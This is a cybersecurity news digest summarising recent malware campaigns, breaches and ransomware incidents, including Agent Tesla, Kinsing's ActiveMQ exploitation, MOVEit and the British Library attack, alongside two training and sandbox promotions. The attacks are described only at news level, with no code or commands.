Daily Brief

A new variant of the Agent Tesla malware leverages ZPAQ compression to evade detection in email-based attacks. The ZPAQ compression format is less commonly used and has been chosen for its better compression ratio and limited software support, which complicates detection. Agent Tesla, first noticed in 2014, is a .NET-based keylogger and RAT provided via a malware-as-a-service model, often infiltrating systems through phishing. Recent campaigns employ an outdated Microsoft Office vulnerability to deliver the payload, which masquerades as a legitimate PDF file in a ZPAQ compressed format. The delivered malicious .NET executable downloads and decrypts additional files, using common file extensions to disguise malicious network traffic. Once executed, Agent Tesla infects endpoints and obfuscates its activity using .NET Reactor; C2 communications are managed through Telegram. The use of ZPAQ suggests attackers are either targeting specific technically savvy individuals or experimenting with new methods to spread malware and undermine security measures.

EMEA organizations are encouraged to maintain constant vigilance against cyber threats through continuous training. Cybersecurity professionals need up-to-date knowledge on emerging threats and defense strategies. The SANS Institute offers a comprehensive course library for 2024 to enhance cybersecurity skills across the region. Training courses cover a wide array of topics including Cloud Security, DFIR, Offensive Operations, Leadership, OSINT, and ICS. Courses are accessible in various formats and locations, catering to professionals already in the field and those starting new careers. Attendees at SANS events gain practical insights from experts actively working in cybersecurity. Participants have the opportunity to earn GIAC certifications, validating their expertise in the rapidly evolving cyber landscape. The full catalogue of SANS 2024 EMEA training courses is available through the provided link for those interested in advancing their cybersecurity knowledge.

Cybercriminals are evolving their phishing attacks by using QR codes, CAPTCHAs, and steganography to deceive individuals and bypass security systems. Quishing, a combination of QR codes and phishing, allows attackers to embed malicious links inside QR codes, evading email spam filters and complicating their detection by security tools. CAPTCHA-based attacks involve tricking users with realistic-looking credential-harvesting forms on websites, protected by CAPTCHAs to thwart automated security tools and web crawlers. In one instance, attackers targeted employees of Halliburton Corporation by requiring a CAPTCHA and then mimicking a convincing Office 365 login page to collect user credentials. Steganography is utilized in phishing to hide harmful scripts in seemingly innocuous media files, such as images, which are delivered to unsuspecting victims via email attachments or illegitimate download links. ANY.RUN is a sandbox environment providing tools for analysis and detection of phishing techniques, offering insights into these sophisticated cyberattacks. ANY.RUN's current promotional offer aims to enhance cybersecurity measures against these increasingly prevalent and advanced phishing tactics.

Kinsing hackers are exploiting a critical vulnerability in Apache ActiveMQ to infect Linux systems. Infected systems suffer from illicit cryptocurrency mining and system performance degradation. The malware targets misconfigured container environments, using server resources for mining profits. The group also rapidly adapts to exploit newly revealed vulnerabilities in web applications. The recent campaign uses CVE-2023-46604, enabling remote code execution for malware installation. The Kinsing malware ensures persistence by loading a rootkit into the system’s library. Organizations using Apache ActiveMQ are urged to update to patched versions to prevent compromises.

A new malware campaign targeting Indian Android smartphone users has been discovered, using socially engineered messages to distribute fraudulent apps. Attackers are utilizing social media platforms, particularly WhatsApp and Telegram, to trick users into installing malicious apps by impersonating banks and government agencies. The fraudulent apps aim to harvest personal information, including banking details, payment card info, account credentials, and potentially intercept one-time passwords. The malware campaigns involve sending APK files through social media, creating a sense of urgency by falsely claiming users must update their permanent account number (PAN). Upon installation, these apps request sensitive information from the user and proceed to transmit the data to a command-and-control server or a specific phone number. The malware has additional capabilities such as hiding its icon from the home screen and reading and sending SMS messages to facilitate financial fraud. Variants of the trojan have also targeted users' credit card details and cryptocurrency wallet information. In light of increasing threats, Google and Samsung have introduced new security features to protect users against malicious app installations. Android users are reminded to be diligent about app permissions and the legitimacy of app developers.

A cyber-espionage campaign linked to the China-based Mustang Panda group has targeted a Philippines government entity during increased South China Sea tensions. Palo Alto Networks' Unit 42 identified three attacks in August 2023 mainly focusing on South Pacific organizations and used legitimate software to sideload malware. Mustang Panda, known by various aliases, uses spear-phishing to deliver malicious payloads and has been active since at least 2012, engaging in espionage against NGOs and governments globally. The Philippines government likely faced a security breach over five days in mid-August through compromised software designed to bypass antivirus solutions. The threat actor also disguised malware traffic as legitimate Microsoft communications for C2 connections and has consistently shown capability in persistent cyberespionage. In addition to the Mustang Panda activity, a South Korean APT actor named Higaisa has also been observed targeting Chinese users with phishing schemes and Rust-based malware.

The Tor Project recently removed several network relays to protect user safety and network security. Relays are essential for anonymizing traffic in the Tor network but were misused for a cryptocurrency scheme. Some relay operators were unaware they were part of a high-risk project or were operating in dangerous regions. The community has debated policies about relay operations and what constitutes policy violations. Profit-driven relay operations conflict with Tor's ethos of volunteerism and fighting against internet censorship. The Tor network could face risks of invasive centralization if for-profit operations scale up significantly. BleepingComputer sought more information from The Tor Project without a response. Unconfirmed reports suggest nearly a thousand blocked relays may be linked to a service known as ATor (AirTor).

LittleDrifter, a USB-propagating worm, has breached systems beyond Ukraine, impacting several countries including the US, Germany, and Vietnam. The worm, affiliated with the state-sponsored Russian espionage group Gamaredon, was supposedly designed to target Ukrainian entities but reached unintended victims. Check Point's research revealed the malware is built in Visual Basic Script (VBS) to spread via USB drives and has ties to Gamaredon's USB PowerShell worm. The Gamaredon group, associated with multiple aliases such as Shuckworm, has a history of cyber espionage focused on Ukrainian government, defense, and critical infrastructure. LittleDrifter is structured to set up communication with designated command and control (C2) servers and disseminates through connected USB drives using deceptive tactics. Gamaredon's operational methodology includes using domain names as a placeholder for C2 server IP addresses, switching them frequently to avoid detection. The primary objective of LittleDrifter appears to be to establish a foothold within the infected system, with contingency plans to communicate with the C2 through a Telegram channel if needed. Although complicated payload deliveries were not observed, the findings suggest that the attacks are highly specified, with LittleDrifter poised for initial foothold operations ahead of further attack stages.

A new variant of Phobos ransomware is using the email address of the malware-sharing collective VX-Underground in its ransom note. Phobos ransomware is related to the Crysis ransomware family and operates as ransomware-as-a-service with affiliates conducting the attacks. The latest variant creates a text note and an HTA file for its ransom message, jokingly stating that 'VX-Underground' is not the decryption password. This ransomware campaign accounts for 4% of all submissions to the ID Ransomware service in 2023. Similar tactics of taunting cybersecurity researchers and communities have been observed with other ransomware groups in the past, sometimes escalating into abusive or harmful actions. The act of misattributing ransomware attacks could be a form of psychological warfare or an attempt to mislead investigators and law enforcement.

Security vulnerability in Progress Software's MOVEit file transfer application led to a massive data breach affecting over 2,620 organizations and more than 77 million individuals. Russian ransomware gang Clop exploited the bug in May, leading to extensive personal data access and leakage. Avast antivirus company, among the victims, acknowledges low-risk personal customer information was accessed but downplays the severity of the breach. Avast offers affected customers six months of free dark web monitoring, alongside a push for an enhanced paid security service, invoking customer backlash. Welltok, another company utilizing MOVEit, reports over 1.6 million patients' data, including sensitive health information, potentially stolen due to the breach. Impacted entities include major healthcare providers such as Stanford Health Care, Corewell Health, and Sutter Health. Welltok's notification to patients indicates that exposed data may include names, addresses, birth dates, Social Security numbers, and health insurance details, among others.

Vikas Singla, the former COO of Securolytics, pleaded guilty to conducting cyberattacks on two hospitals within the Gwinnett Medical Center in 2018. The attacks disrupted hospital phone and network printer services and involved stealing over 200 patients' personal information. Singla aimed to strengthen his company's business by exploiting the publicity from these attacks, including using the information in Securolytics' client outreach. The FBI condemned the attacks for jeopardizing patients' health and safety, with potential catastrophic consequences. Singla was initially charged with 17 counts of intentional damage to a protected computer and one count of obtaining information from the same. He faces over $817,000 in restitution payments to the victims and is recommended to serve a 57-month probation sentence due to serious health conditions, with sentencing scheduled for February 15, 2024.

Two Canadian government contractors, BGRS and SIRVA, experienced cyber breaches, compromising sensitive data. The LockBit ransomware gang claimed responsibility for the attack on SIRVA and leaked 1.5TB of alleged stolen documents. Personal and financial information of government employees, RCMP, and Canadian Armed Forces personnel from 1999 is at risk. The Government of Canada responded by offering support services such as credit monitoring and passport reissuance to those affected. A detailed analysis is underway to determine the full scope of the breach and identify all impacted individuals. Affected individuals are advised to update login credentials, use multi-factor authentication, and monitor accounts for unusual activity.

A former COO, Vikas Singla, of the cybersecurity firm Securolytics, pleaded guilty to cyberattacks on two hospitals in 2018. Singla intentionally disrupted the Ascom phone system used for critical communications at Gwinnett Medical Center, impacting over 200 devices. The cyberattack compromised patient data stored on a Hologic R2 Digitizer, with information of over 300 patients stolen. After the attacks, Securolytics started reaching out to potential clients using the incidents to market their services. Singla's plea deal recommends house detention for 57 months instead of prison, citing his serious health conditions. Singla is ordered to pay restitution amounting to $817,804.12 to Northside Hospital and an insurance company for the damages caused by his actions. The rationalization for house detention includes Singla's battling with an extraordinary form of cancer and a dangerous vascular condition.

Kinsing malware operators are exploiting CVE-2023-46604, a critical vulnerability in Apache ActiveMQ, for remote code execution on Linux systems. Despite the availability of a patch since late October, many servers are still vulnerable, with several ransomware groups capitalizing on unpatched systems. Kinsing aims to deploy cryptocurrency miners, previously leveraging other vulnerabilities like Log4Shell and an Atlassian Confluence RCE bug. The malware utilizes 'ProcessBuilder' to execute commands for downloading additional payloads, while evading detection techniques. Before initiating crypto mining, Kinsing eliminates competition by terminating other Monero mining processes and establishes persistence through a cronjob. A rootkit is added to the '/etc/ld.so.preload' directory for stealthy, system-wide execution and to complicate its removal. Organizations are at continuous risk and advised to upgrade Apache Active MQ to versions inoculated against the security flaw to mitigate threats.

The Rhysida ransomware gang has claimed responsibility for the cyberattack on the British Library that occurred in October. The attack has caused an extensive IT outage, with the library's systems encrypted and services disrupted for several weeks. Rhysida is currently auctioning off data it claims to have stolen from the library, offering it exclusively to one buyer without the option for resale. A low-resolution screenshot of purportedly stolen ID scans from the library's systems was released by the group as proof of the breach. The FBI and CISA had previously warned about Rhysida's attacks targeting various sectors, describing the ransomware as a service (RaaS) operation. Leaked HR documents from the British Library have been confirmed, and users are urged to change their passwords as a precaution. The British Library's online and onsite services, such as Wi-Fi and its website, continue to be impacted nearly three weeks post-attack. The library holds over 150 million items and adds approximately 3 million new items annually, serving over 11 million visitors online and 16,000 individuals onsite and online daily.